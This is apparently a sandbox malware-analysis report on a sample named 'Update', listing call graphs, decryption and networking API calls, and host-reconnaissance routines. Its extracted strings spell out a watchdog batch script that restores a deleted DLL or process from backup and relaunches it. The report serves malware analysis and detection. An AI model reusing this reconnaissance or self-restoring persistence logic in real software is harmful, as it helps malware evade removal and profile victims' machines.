std::ios_base::_Ios_base_dtor 72630->72732 72632 6ca81bef 72632->72182 72633->72172 72634->72181 72636 6caaa8a9 72635->72636 72637 6caaa8af 72635->72637 72662 6caac942 6 API calls std::_Lockit::_Lockit 72636->72662 72641 6caaa8b3 SetLastError 72637->72641 72663 6caac981 6 API calls std::_Lockit::_Lockit 72637->72663 72640 6caaa8cb 72640->72641 72643 6caacf6f __Getctype 14 API calls 72640->72643 72645 6caaa948 72641->72645 72646 6ca81a6d 72641->72646 72644 6caaa8e0 72643->72644 72647 6caaa8e8 72644->72647 72648 6caaa8f9 72644->72648 72670 6caa3fb8 39 API calls CallUnexpected 72645->72670 72646->72568 72664 6caac981 6 API calls std::_Lockit::_Lockit 72647->72664 72665 6caac981 6 API calls std::_Lockit::_Lockit 72648->72665 72653 6caaa8f6 72667 6caaa607 14 API calls __dosmaperr 72653->72667 72654 6caaa905 72655 6caaa909 72654->72655 72656 6caaa920 72654->72656 72666 6caac981 6 API calls std::_Lockit::_Lockit 72655->72666 72668 6caaabd0 14 API calls __Getctype 72656->72668 72660 6caaa92b 72669 6caaa607 14 API calls __dosmaperr 72660->72669 72662->72637 72663->72640 72664->72653 72665->72654 72666->72653 72667->72641 72668->72660 72669->72641 72671->72582 72673 6ca811e8 _strlen 72672->72673 72681 6ca81259 72673->72681 72694 6ca82060 39 API calls CallUnexpected 72673->72694 72677 6ca81493 72678 6ca814a6 72677->72678 72695 6ca82d90 39 API calls CallUnexpected 72677->72695 72678->72601 72681->72677 72696 6ca82300 38 API calls 72681->72696 72697 6ca826d0 30 API calls 3 library calls 72681->72697 72698 6ca9d2b3 RaiseException 72681->72698 72683 6ca8160f 72682->72683 72684 6ca81623 72683->72684 72685 6ca8164d 72683->72685 72699 6ca82060 39 API calls CallUnexpected 72683->72699 72686 6ca8175d 72684->72686 72702 6ca82300 38 API calls 72684->72702 72703 6ca826d0 30 API calls 3 library calls 72684->72703 72704 6ca9d2b3 RaiseException 72684->72704 72685->72684 72700 6ca82eb0 67 API calls 2 library calls 72685->72700 72690 6ca81197 72686->72690 72701 6ca82d90 39 API calls CallUnexpected 72686->72701 72690->72599 72694->72681 72695->72678 72696->72681 72697->72681 72698->72681 72699->72685 72700->72684 72701->72690 72702->72684 72703->72684 72704->72684 72705->72605 72707 6caa36af 72706->72707 72708 6caa36be 72707->72708 72725 6cab0a69 CreateFileW ___initconin 72707->72725 72711 6ca9aa82 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 72708->72711 72710 6caa36cb 72710->72708 72726 6cab0ada 5 API calls ___initconin 72710->72726 72712 6caa33f4 72711->72712 72722 6caa341a 72712->72722 72714 6caa36dc 72714->72708 72715 6caa371c 72714->72715 72719 6caa3709 __alloca_probe_16 72714->72719 72721 6caa3746 72714->72721 72727 6caaa641 15 API calls 2 library calls 72715->72727 72718 6caa3722 72718->72719 72719->72721 72728 6cab0b20 5 API calls ___initconin 72719->72728 72729 6ca9cb0b 14 API calls ___std_exception_copy 72721->72729 72730 6caa3d5d LeaveCriticalSection 72722->72730 72724 6caa3405 72724->72172 72725->72710 72726->72714 72727->72718 72728->72721 72729->72708 72730->72724 72731->72613 72732->72632 72733->72188 72734->72205 72736 6ca8c5b5 72735->72736 72737 6ca8bd70 77 API calls 72736->72737 72738 6ca8c656 72737->72738 72739 6ca9aa0e 3 API calls 72738->72739 72740 6ca8c68e 72739->72740 72741 6ca9b2cf 44 API calls 72740->72741 72742 6ca8c6a2 72741->72742 72743 6ca8bb60 118 API calls 72742->72743 72744 6ca8c74b 72743->72744 72745 6ca8c785 72744->72745 72798 6ca82300 38 API calls 72744->72798 72745->72209 72747 6ca8c7bf 72799 6ca826d0 30 API calls 3 library calls 72747->72799 72749 6ca8c7d1 72800 6ca9d2b3 RaiseException 72749->72800 72751 6ca8c7e6 72752 6ca8a100 72 API calls 72751->72752 72753 6ca8c7ff 72752->72753 72753->72209 72755 6ca978bf 72754->72755 72801 6ca8cd30 72755->72801 72758 6ca9761b 72760 6ca97a10 72758->72760 72761 6ca97a79 72760->72761 72762 6ca97b55 72760->72762 72765 6ca8cd30 75 API calls 72761->72765 72914 6ca82300 38 API calls 72762->72914 72764 6ca97b7e 72915 6ca82370 30 API calls 72764->72915 72767 6ca97aa1 72765->72767 72769 6ca97ab5 72767->72769 72778 6ca8ac40 70 API calls 72767->72778 72768 6ca97b90 72916 6ca9d2b3 RaiseException 72768->72916 72771 6ca97651 72769->72771 72917 6ca82300 38 API calls 72769->72917 72771->72216 72771->72217 72773 6ca97bca 72918 6ca826d0 30 API calls 3 library calls 72773->72918 72775 6ca97be5 72919 6ca9d2b3 RaiseException 72775->72919 72777 6ca97bfa 72778->72769 72779->72230 72781 6ca89bb9 72780->72781 72782 6ca89b89 72780->72782 72783 6ca89c7a 72781->72783 72785 6ca89c8c 72781->72785 72784 6ca8b030 69 API calls 72782->72784 72786 6ca9aa82 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 72783->72786 72787 6ca89baf 72784->72787 72920 6ca82300 38 API calls 72785->72920 72788 6ca89c85 72786->72788 72790 6caa4007 69 API calls 72787->72790 72788->72234 72790->72781 72791 6ca89cbc 72921 6ca82370 30 API calls 72791->72921 72793 6ca89ccc 72922 6ca9d2b3 RaiseException 72793->72922 72795 6ca89cd7 72796->72219 72797->72229 72798->72747 72799->72749 72800->72751 72802 6ca8cd6c 72801->72802 72803 6ca8cda1 72801->72803 72818 6ca8cd9a 72802->72818 72834 6ca82300 38 API calls 72802->72834 72809 6ca8cdb2 72803->72809 72832 6ca82060 39 API calls CallUnexpected 72803->72832 72806 6ca8cf7f 72835 6ca82370 30 API calls 72806->72835 72808 6ca8cf8e 72836 6ca9d2b3 RaiseException 72808->72836 72809->72818 72833 6ca84ca0 67 API calls 3 library calls 72809->72833 72813 6ca8cfcb 72838 6ca82370 30 API calls 72813->72838 72815 6ca8cdec 72815->72818 72837 6ca82300 38 API calls 72815->72837 72816 6ca8cfe1 72839 6ca9d2b3 RaiseException 72816->72839 72818->72758 72819 6ca8ac40 72818->72819 72820 6ca8acdc 72819->72820 72821 6ca8ac92 72819->72821 72822 6ca9aa82 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 72820->72822 72823 6ca8b030 69 API calls 72821->72823 72831 6ca8acfe 72822->72831 72824 6ca8ac9d 72823->72824 72824->72820 72825 6ca8acb9 72824->72825 72840 6caa2fee 72824->72840 72825->72820 72844 6caa4614 72825->72844 72828 6ca8acd1 72828->72820 72829 6ca8ad0a 72828->72829 72830 6ca9aa82 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 72829->72830 72830->72831 72831->72758 72832->72809 72833->72815 72834->72806 72835->72808 72836->72815 72837->72813 72838->72816 72839->72818 72841 6caa3001 ___std_exception_copy 72840->72841 72842 6caa3267 67 API calls 72841->72842 72843 6caa3016 ___std_exception_copy 72842->72843 72843->72825 72845 6caa461f 72844->72845 72846 6caa4634 72844->72846 72862 6caa2f04 14 API calls __dosmaperr 72845->72862 72848 6caa463c 72846->72848 72849 6caa4651 72846->72849 72864 6caa2f04 14 API calls __dosmaperr 72848->72864 72858 6caafeff 72849->72858 72851 6caa4624 72863 6caa3a4e 29 API calls ___std_exception_copy 72851->72863 72854 6caa4641 72865 6caa3a4e 29 API calls ___std_exception_copy 72854->72865 72856 6caa464c 72856->72828 72857 6caa462f 72857->72828 72859 6caaff13 ___std_exception_copy 72858->72859 72866 6cab04a8 72859->72866 72861 6caaff1f ___std_exception_copy 72861->72856 72862->72851 72863->72857 72864->72854 72865->72856 72867 6cab04b4 ___scrt_is_nonwritable_in_current_image 72866->72867 72868 6cab04bb 72867->72868 72869 6cab04de 72867->72869 72892 6caa3bf7 29 API calls 2 library calls 72868->72892 72877 6caa00a9 EnterCriticalSection 72869->72877 72872 6cab04d4 72872->72861 72873 6cab04ec 72878 6cab0307 72873->72878 72875 6cab04fb 72893 6cab052d LeaveCriticalSection __fread_nolock 72875->72893 72877->72873 72879 6cab033e 72878->72879 72880 6cab0316 72878->72880 72882 6caaf3a2 __fread_nolock 29 API calls 72879->72882 72897 6caa3bf7 29 API calls 2 library calls 72880->72897 72884 6cab0347 72882->72884 72883 6cab0331 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 72883->72875 72894 6caafd39 72884->72894 72886 6cab0408 72886->72883 72899 6cab013c 33 API calls 2 library calls 72886->72899 72888 6cab03f1 72898 6caaff91 34 API calls 4 library calls 72888->72898 72890 6cab0400 72890->72883 72892->72872 72893->72872 72900 6caafd57 72894->72900 72897->72883 72898->72890 72899->72883 72901 6caafd63 ___scrt_is_nonwritable_in_current_image 72900->72901 72902 6caafda6 72901->72902 72904 6caafdec 72901->72904 72910 6caafd52 72901->72910 72912 6caa3bf7 29 API calls 2 library calls 72902->72912 72911 6cab7171 EnterCriticalSection 72904->72911 72906 6caafdf2 72907 6caafe13 72906->72907 72908 6caafe7c __fread_nolock 31 API calls 72906->72908 72913 6caafe74 LeaveCriticalSection __wsopen_s 72907->72913 72908->72907 72910->72883 72910->72886 72910->72888 72911->72906 72912->72910 72913->72910 72914->72764 72915->72768 72916->72769 72917->72773 72918->72775 72919->72777 72920->72791 72921->72793 72922->72795 72972 6ca86520 72923->72972 72925 6ca86faf CryptAcquireContextW 72927 6ca86fdc CryptImportKey 72925->72927 72928 6ca873c2 72925->72928 72926 6ca86eee _Yarn 72926->72925 72929 6ca8742a CryptReleaseContext 72927->72929 72930 6ca87032 CryptSetKeyParam 72927->72930 72996 6ca9d87e 29 API calls ___std_exception_copy 72928->72996 72998 6ca9d87e 29 API calls ___std_exception_copy 72929->72998 72932 6ca8704a CryptSetKeyParam 72930->72932 72933 6ca87494 CryptDestroyKey CryptReleaseContext 72930->72933 72936 6ca87507 CryptDestroyKey CryptReleaseContext 72932->72936 72948 6ca87070 72932->72948 73000 6ca9d87e 29 API calls ___std_exception_copy 72933->73000 72934 6ca87404 72997 6ca9d2b3 RaiseException 72934->72997 73002 6ca9d87e 29 API calls ___std_exception_copy 72936->73002 72938 6ca8746e 72999 6ca9d2b3 RaiseException 72938->72999 72941 6ca870bc _Yarn 72949 6ca87115 CryptDecrypt CryptDestroyKey CryptReleaseContext 72941->72949 72942 6ca87422 73006 6ca826c0 30 API calls 3 library calls 72942->73006 72944 6ca874e1 73001 6ca9d2b3 RaiseException 72944->73001 72946 6ca87551 73003 6ca9d2b3 RaiseException 72946->73003 72947 6ca875d8 73007 6ca87640 54 API calls 4 library calls 72947->73007 72948->72941 72948->72947 72952 6ca870b3 72948->72952 72953 6ca870d7 72948->72953 72950 6ca87574 72949->72950 72964 6ca87147 __fread_nolock 72949->72964 73004 6ca9d87e 29 API calls ___std_exception_copy 72950->73004 72958 6ca9aa0e 3 API calls 72952->72958 72959 6ca9aa0e 3 API calls 72953->72959 72956 6ca875dd 73008 6ca86720 72956->73008 72958->72941 72959->72941 72961 6ca875aa 73005 6ca9d2b3 RaiseException 72961->73005 72962 6ca875ef 72962->72237 72964->72942 72965 6ca8722b 72964->72965 72966 6ca87212 72964->72966 72970 6ca871cf std::ios_base::_Ios_base_dtor _Yarn 72964->72970 72968 6ca9aa0e 3 API calls 72965->72968 72967 6ca9aa0e 3 API calls 72966->72967 72967->72970 72968->72970 72969 6caa3a5e 29 API calls 72969->72928 72970->72969 72971 6ca87398 std::ios_base::_Ios_base_dtor 72970->72971 72971->72237 72973 6ca8655f 72972->72973 72974 6ca86561 CryptStringToBinaryA 72972->72974 72973->72974 72975 6ca8662b 72974->72975 72976 6ca8657e 72974->72976 73053 6ca866c0 29 API calls 2 library calls 72975->73053 72977 6ca865b3 __fread_nolock 72976->72977 72981 6ca865aa 72976->72981 72982 6ca865cd 72976->72982 72995 6ca86691 72976->72995 72980 6ca86600 CryptStringToBinaryA 72977->72980 72979 6ca8663a 73054 6ca9d2b3 RaiseException 72979->73054 72985 6ca86618 72980->72985 72986 6ca86645 72980->72986 72987 6ca9aa0e 3 API calls 72981->72987 72988 6ca9aa0e 3 API calls 72982->72988 72985->72926 73055 6ca9d87e 29 API calls ___std_exception_copy 72986->73055 72987->72977 72988->72977 72989 6ca86699 72990 6ca86720 46 API calls 72989->72990 72992 6ca866af 72990->72992 72992->72926 72993 6ca86672 73056 6ca9d2b3 RaiseException 72993->73056 73057 6ca87640 54 API calls 4 library calls 72995->73057 72996->72934 72997->72942 72998->72938 72999->72942 73000->72944 73001->72942 73002->72946 73003->72942 73004->72961 73005->72942 73006->72947 73007->72956 73009 6ca8672a 73008->73009 73010 6ca8674a std::ios_base::_Ios_base_dtor 73008->73010 73009->73010 73011 6caa3a5e 29 API calls 73009->73011 73010->72962 73012 6ca86775 CryptAcquireContextW 73011->73012 73014 6ca86e09 73012->73014 73015 6ca86814 __fread_nolock 73012->73015 73068 6ca9d87e 29 API calls ___std_exception_copy 73014->73068 73017 6ca869e8 CryptReleaseContext 73015->73017 73018 6ca8685e CryptCreateHash 73015->73018 73023 6ca86884 CryptHashData 73015->73023 73034 6ca868e7 CryptHashData 73015->73034 73043 6ca86980 CryptGetHashParam CryptDestroyHash 73015->73043 73049 6ca86a0a std::ios_base::_Ios_base_dtor _Yarn 73017->73049 73018->73015 73020 6ca86d1c CryptReleaseContext 73018->73020 73019 6ca86e42 73069 6ca9d2b3 RaiseException 73019->73069 73064 6ca9d87e 29 API calls ___std_exception_copy 73020->73064 73023->73015 73025 6ca86d8d CryptDestroyHash CryptReleaseContext 73023->73025 73024 6ca86d60 73065 6ca9d2b3 RaiseException 73024->73065 73066 6ca9d87e 29 API calls ___std_exception_copy 73025->73066 73026 6ca86720 30 API calls 73029 6ca86e7f 73026->73029 73032 6ca86720 30 API calls 73029->73032 73030 6ca86c52 73030->73026 73031 6ca86dda 73067 6ca9d2b3 RaiseException 73031->73067 73035 6ca86e87 73032->73035 73036 6ca86c5a CryptDestroyHash CryptReleaseContext 73034->73036 73037 6ca86904 CryptGetHashParam 73034->73037 73035->72962 73060 6ca9d87e 29 API calls ___std_exception_copy 73036->73060 73037->73015 73039 6ca86cbb CryptDestroyHash CryptReleaseContext 73037->73039 73062 6ca9d87e 29 API calls ___std_exception_copy 73039->73062 73040 6ca86c9b 73061 6ca9d2b3 RaiseException 73040->73061 73043->73015 73046 6ca86c02 CryptReleaseContext 73043->73046 73044 6ca86cfc 73063 6ca9d2b3 RaiseException 73044->73063 73058 6ca9d87e 29 API calls ___std_exception_copy 73046->73058 73048 6ca86c3a 73059 6ca9d2b3 RaiseException 73048->73059 73050 6ca86bdf std::ios_base::_Ios_base_dtor 73049->73050 73051 6caa3a5e 29 API calls 73049->73051 73050->72962 73051->73014 73053->72979 73054->72986 73055->72993 73056->72995 73057->72989 73058->73048 73059->73030 73060->73040 73061->73030 73062->73044 73063->73030 73064->73024 73065->73030 73066->73031 73067->73030 73068->73019 73069->73030 73078 6ca9614e 73077->73078 73079 6ca96152 _Yarn 73078->73079 73080 6ca962cc 73078->73080 73083 6ca961ba 73078->73083 73079->72258 73093 6ca826c0 30 API calls 3 library calls 73080->73093 73082 6ca96252 73087 6ca9aa0e 3 API calls 73082->73087 73083->73082 73085 6ca961da 73083->73085 73084 6ca962d1 73084->72258 73086 6ca9aa0e 3 API calls 73085->73086 73086->73079 73087->73079 73088->72261 73089->72278 73090->72280 73091->72282 73092->72267 73093->73084 73094->72296 73095->72315 73096->72322 73097->72339 73098->72355 73105->72387 73124->72376 73186 1001f63d send 73187 6ca94915 73188 6ca94923 DeleteFileA 73187->73188 73198 6ca9492e std::ios_base::_Ios_base_dtor 73188->73198 73189 6caa3a5e 29 API calls 73190 6ca94d5d 73189->73190 73213 6ca826c0 30 API calls 3 library calls 73190->73213 73192 6ca94d69 73214 6ca826c0 30 API calls 3 library calls 73192->73214 73194 6ca94d75 73215 6ca826c0 30 API calls 3 library calls 73194->73215 73196 6ca94d81 73216 6ca826c0 30 API calls 3 library calls 73196->73216 73198->73189 73203 6ca94d34 std::ios_base::_Ios_base_dtor 73198->73203 73199 6ca94d8d 73217 6ca826c0 30 API calls 3 library calls 73199->73217 73201 6ca94d99 73218 6ca826c0 30 API calls 3 library calls 73201->73218 73204 6ca94da5 73219 6ca826c0 30 API calls 3 library calls 73204->73219 73206 6ca94db1 73220 6ca826c0 30 API calls 3 library calls 73206->73220 73208 6ca94dbd 73221 6ca826c0 30 API calls 3 library calls 73208->73221 73210 6ca94dc9 73222 6ca826c0 30 API calls 3 library calls 73210->73222 73212 6ca94dd5 73213->73192 73214->73194 73215->73196 73216->73199 73217->73201 73218->73204 73219->73206 73220->73208 73221->73210 73222->73212 73223 1001f0df 73230 10002c60 WSAStartup CreateEventW InterlockedExchange 73223->73230 73225 10006f17 77 API calls 73226 1001f0e4 73225->73226 73226->73225 73227 1001f7db 73226->73227 73233 10005a20 CreateEventW 73227->73233 73231 10006815 __NMSG_WRITE 5 API calls 73230->73231 73232 10002cff 73231->73232 73232->73226 73234 10005a83 73233->73234 73235 10005a79 73233->73235 73261 10006410 HeapCreate 73234->73261 73267 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73235->73267 73239 10005b12 73268 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73239->73268 73240 10005b1c CreateEventW 73242 10005b55 73240->73242 73243 10005b5f CreateEventW 73240->73243 73269 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73242->73269 73245 10005b84 CreateEventW 73243->73245 73246 10005b7a 73243->73246 73248 10005ba9 InitializeCriticalSectionAndSpinCount 73245->73248 73249 10005b9f 73245->73249 73270 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73246->73270 73251 10005c77 InitializeCriticalSectionAndSpinCount 73248->73251 73252 10005c6d 73248->73252 73271 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73249->73271 73254 10005c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 73251->73254 73255 10005c8e 73251->73255 73272 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73252->73272 73257 100067ff 77 API calls 73254->73257 73273 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73255->73273 73258 10005d2b 73257->73258 73259 100067ff 77 API calls 73258->73259 73260 10005d3b 73259->73260 73262 10006441 73261->73262 73263 10006437 73261->73263 73265 10005af2 InitializeCriticalSectionAndSpinCount 73262->73265 73275 10006e49 66 API calls 2 library calls 73262->73275 73274 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73263->73274 73265->73239 73265->73240 73267->73234 73268->73240 73269->73243 73270->73245 73271->73248 73272->73251 73273->73254 73274->73262 73275->73265

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 37f5430-37f54b7 call 37ff707 call 3806770 * 3 gethostname gethostbyname 9 37f54bd-37f5504 inet_ntoa call 38003cf * 2 0->9 10 37f555c-37f569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 37f7490 GetSystemInfo wsprintfW call 37f6c50 call 37f6ee0 GetForegroundWindow 0->10 9->10 20 37f5506-37f5508 9->20 23 37f569f-37f56ac GetWindowTextW 10->23 24 37f56b2-37f56c0 10->24 22 37f5510-37f555a inet_ntoa call 38003cf * 2 20->22 22->10 23->24 26 37f56cc-37f56f0 lstrlenW call 37f6d70 24->26 27 37f56c2 24->27 33 37f5702-37f5726 call 37ff876 26->33 34 37f56f2-37f56ff call 37ff876 26->34 27->26 39 37f5728 33->39 40 37f5732-37f5756 lstrlenW call 37f6d70 33->40 34->33 39->40 43 37f5768-37f57b9 GetModuleHandleW GetProcAddress 40->43 44 37f5758-37f5765 call 37ff876 40->44 46 37f57bb-37f57c4 GetNativeSystemInfo 43->46 47 37f57c6-37f57cd GetSystemInfo 43->47 44->43 49 37f57d3-37f57e1 46->49 47->49 50 37f57ed-37f57f2 49->50 51 37f57e3-37f57eb 49->51 53 37f57f9-37f5820 wsprintfW call 37f6a70 GetCurrentProcessId 50->53 51->50 52 37f57f4 51->52 52->53 56 37f5885-37f588c call 37f6690 53->56 57 37f5822-37f583c OpenProcess 53->57 63 37f589e-37f58ab 56->63 64 37f588e-37f589c 56->64 57->56 59 37f583e-37f5853 K32GetProcessImageFileNameW 57->59 61 37f585e-37f5866 call 37f80f0 59->61 62 37f5855-37f585c 59->62 68 37f586b-37f586d 61->68 65 37f587f CloseHandle 62->65 67 37f58ac-37f59a1 call 37ff876 call 37f6490 call 37f6150 call 37ffc0e GetTickCount call 380043c call 38003a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 63->67 64->67 65->56 83 37f59ca-37f59e9 67->83 84 37f59a3-37f59c8 67->84 70 37f586f-37f5876 68->70 71 37f5878-37f587e 68->71 70->65 71->65 85 37f59ea-37f5a0f call 37f5a30 call 37f3160 83->85 84->85 88 37f5a11-37f5a2e call 37fefff call 37ff00a 85->88
                                                                                                APIs
                                                                                                  • Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721
                                                                                                • _memset.LIBCMT ref: 037F546C
                                                                                                • _memset.LIBCMT ref: 037F5485
                                                                                                • _memset.LIBCMT ref: 037F5495
                                                                                                • gethostname.WS2_32(?,00000032), ref: 037F54A3
                                                                                                • gethostbyname.WS2_32(?), ref: 037F54AD
                                                                                                • inet_ntoa.WS2_32 ref: 037F54C5
                                                                                                • _strcat_s.LIBCMT ref: 037F54D8
                                                                                                • _strcat_s.LIBCMT ref: 037F54F1
                                                                                                • inet_ntoa.WS2_32 ref: 037F551A
                                                                                                • _strcat_s.LIBCMT ref: 037F552D
                                                                                                • _strcat_s.LIBCMT ref: 037F5546
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 037F5573
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 037F5587
                                                                                                • GetLastInputInfo.USER32(?), ref: 037F559A
                                                                                                • GetTickCount.KERNEL32 ref: 037F55A0
                                                                                                • wsprintfW.USER32 ref: 037F55D5
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 037F55E8
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 037F55FC
                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 037F5653
                                                                                                • wsprintfW.USER32 ref: 037F566C
                                                                                                • GetForegroundWindow.USER32 ref: 037F5695
                                                                                                • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 037F56AC
                                                                                                • lstrlenW.KERNEL32(000008CC), ref: 037F56D3
                                                                                                • lstrlenW.KERNEL32(00000994), ref: 037F5739
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 037F57AA
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 037F57B1
                                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 037F57C2
                                                                                                • GetSystemInfo.KERNEL32(?), ref: 037F57CD
                                                                                                • wsprintfW.USER32 ref: 037F5806
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 037F5818
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 037F582E
                                                                                                • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 037F584B
                                                                                                • CloseHandle.KERNEL32(03815164), ref: 037F587F
                                                                                                • GetTickCount.KERNEL32 ref: 037F58E9
                                                                                                • __time64.LIBCMT ref: 037F58F8
                                                                                                • __localtime64.LIBCMT ref: 037F592F
                                                                                                • wsprintfW.USER32 ref: 037F5968
                                                                                                • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 037F597D
                                                                                                • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 037F598C
                                                                                                • GetCurrentHwProfileW.ADVAPI32(?), ref: 037F5999
                                                                                                  • Part of subcall function 037F80F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 037F8132
                                                                                                  • Part of subcall function 037F80F0: lstrcmpiW.KERNEL32(?,A:\), ref: 037F8166
                                                                                                  • Part of subcall function 037F80F0: lstrcmpiW.KERNEL32(?,B:\), ref: 037F8176
                                                                                                  • Part of subcall function 037F80F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037F81A6
                                                                                                  • Part of subcall function 037F80F0: lstrlenW.KERNEL32(?), ref: 037F81B7
                                                                                                  • Part of subcall function 037F80F0: __wcsnicmp.LIBCMT ref: 037F81CE
                                                                                                  • Part of subcall function 037F80F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 037F8204
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                • String ID: %d min$1.0$2024.12.13$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                • API String ID: 1101047656-3994836811
                                                                                                • Opcode ID: f1bdc08f4aefec6f9c125d8d84945c737a97f7a3763f7232a0b0fa96da5518f4
                                                                                                • Instruction ID: a2ae0ff94ff1e13b1c224066a2d6038cfd9f30f405a652cb685bab3ca5bad152
                                                                                                • Opcode Fuzzy Hash: f1bdc08f4aefec6f9c125d8d84945c737a97f7a3763f7232a0b0fa96da5518f4
                                                                                                • Instruction Fuzzy Hash: CAF1D4B5940704AFD724EBA4CC85FEAB3BCBF85700F004598E71AE7281EA70AA44CF55
                                                                                                APIs
                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 6CA87ED6
                                                                                                • _strlen.LIBCMT ref: 6CA87EF2
                                                                                                • _strlen.LIBCMT ref: 6CA881F6
                                                                                                • _strlen.LIBCMT ref: 6CA887FD
                                                                                                • _strlen.LIBCMT ref: 6CA88A61
                                                                                                • CopyFileA.KERNEL32(6CA99F47,?,00000000), ref: 6CA88C17
                                                                                                • _strlen.LIBCMT ref: 6CA88C7B
                                                                                                • CopyFileA.KERNEL32(00000000,?,00000000), ref: 6CA88E42
                                                                                                • _strlen.LIBCMT ref: 6CA8848C
                                                                                                  • Part of subcall function 6CA811B0: _strlen.LIBCMT ref: 6CA811E3
                                                                                                • _strlen.LIBCMT ref: 6CA88EDD
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,00000000,?,00000001,00000040,00000001), ref: 6CA89143
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6CA8914E
                                                                                                • CreateProcessA.KERNEL32 ref: 6CA89199
                                                                                                • _strlen.LIBCMT ref: 6CA891C3
                                                                                                • CloseHandle.KERNEL32(?,?,00000002,00000040,00000001), ref: 6CA89417
                                                                                                • CloseHandle.KERNEL32(?), ref: 6CA8941F
                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA8946E
                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA894BD
                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA89596
                                                                                                Strings
                                                                                                • .pid, xrefs: 6CA892DF
                                                                                                • .bat, xrefs: 6CA88949
                                                                                                • cmd.exe /B /c "%s", xrefs: 6CA8899C
                                                                                                • Failed to create backup EXE. Please check the EXE path: , xrefs: 6CA88E56
                                                                                                • if %ERRORLEVEL% neq 0 (, xrefs: 6CA88769
                                                                                                • set "BackupProcessPath=, xrefs: 6CA881C3
                                                                                                • copy /Y "%BackupProcessPath%" "%ProcessPath%", xrefs: 6CA886DD
                                                                                                • copy /Y "%BackupDLLPath%" "%DLLPath%", xrefs: 6CA8872D
                                                                                                • set "ProcessPath=, xrefs: 6CA88186
                                                                                                • Failed to create backup DLL. Please check the DLL path: , xrefs: 6CA88C2B
                                                                                                • if not exist "%DLLPath%" (, xrefs: 6CA88705
                                                                                                • goto CheckProcess, xrefs: 6CA887B9
                                                                                                • tor., xrefs: 6CA892E7
                                                                                                • set "DLLPath=, xrefs: 6CA88422
                                                                                                • if not exist "%ProcessPath%" (, xrefs: 6CA886BB
                                                                                                • @echo off, xrefs: 6CA88129
                                                                                                • echo DLL file not found, restoring from backup..., xrefs: 6CA88719
                                                                                                • set "ProcessName=, xrefs: 6CA88151
                                                                                                • start "" "%ProcessPath%", xrefs: 6CA8877D
                                                                                                • set "BackupDLLPath=, xrefs: 6CA88459
                                                                                                • tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul, xrefs: 6CA88755
                                                                                                • timeout /t 30 /nobreak >nul, xrefs: 6CA887A5
                                                                                                • echo Process file not found, restoring from backup..., xrefs: 6CA886C9
